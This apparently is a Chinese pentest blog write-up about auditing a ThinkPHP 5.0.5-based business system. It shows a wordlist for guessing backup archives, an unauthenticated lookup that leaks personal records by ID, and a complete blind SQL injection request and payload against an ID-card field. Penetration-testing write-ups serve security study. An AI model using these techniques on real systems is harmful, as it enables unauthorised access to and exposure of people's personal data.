文章详情
一次简单的实战—TP二次开发代码审计
日期:2020/10/29 12:00:15
0x01 开始:
[+] 基本信息:
- Thinkphp5.0.5
存在WAF,貌似是某武盾
某费业务系统
[+] 关键点:
在得到目标域名时,结合目公司名称关键字,还有域名的关键字,试着与敏感的备份文件简单组合一下,得到简单的敏感文件字典,字典大致格式为,进行简单的目录扫描,手动去测试逻辑部分,不一会儿目录扫描结果得到业务系统的备份文件,名称为: 关键字+backup.tar.gz
:
关键字+buckup.zip
关键字+buckup.rar
关键字+buckup.zip.tar
关键字+buckup.tar.gz
www+关键字.zip
www+关键字.rar
www+关键字.zip.tar
www+关键字.tar.gz
关键字.zip
关键字.rar
可以随意组合即可,也可以看一下参数命名方式,猜测管理员的命名习惯.....
0x02 代码审计
系统是由ThinkPHP5.0.5进行二次开发而搭建的,因为以前只是简单看过ThinkPHP代码,并不了解Thinkphp,google了一下,对应目录结构,看一下代码:
[+] 系统路由:
[+] SQL注入漏洞
身份证号处:
(1)正常传参:
对输入没有任何限制,只是前端限制了输入长度,抓包后,随便传个id,就得到个人数据
(2)注入测试
- 存在WAF,后端数据库为
MySQL
,ThinkPHP-dubug
也没有开启,简单构造盲注证明一下危害即可:
Payload:
- 查询user长度,长度为14:
POST /index/index/p_card.html HTTP/1.1
Content-Length: 59
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Connection: close
card=1")/(case when length(user())=0 then 1 else 0 end)+--+
上一文章:通达OA任意文件删除
下一文章:AKSK命令执行到谷歌验证码劫持
相关推荐
- 10-21记一次微信小程序渗透测试
- 10-28强网杯2020-GooExecchromepwn分析及两种利用
- 11-02D盾dll劫持利用
- 10-21ZeroLogon(CVE-2020-1472)分析与狩猎
- 05-10NUAACTF2021Easy_XSS复现
- 10-30【实战】无回显Rce到Getshell
- 10-22AbusingWindowsPhysical
- 08-11快速找到qq历史头像
- 05-08浅谈域渗透中的组策略及gpp运用
- 05-02小风原创表白网页源码
- 05-14TCP的拆包和粘包的原因及处理方法
- 10-21由Arduino制作badusb联动cs进行一插上线
- 05-21SOCasS(把SOC当作一种服务)的架构部署和技术
- 11-04GitHub企业版RCE漏洞(GitHubEnterprise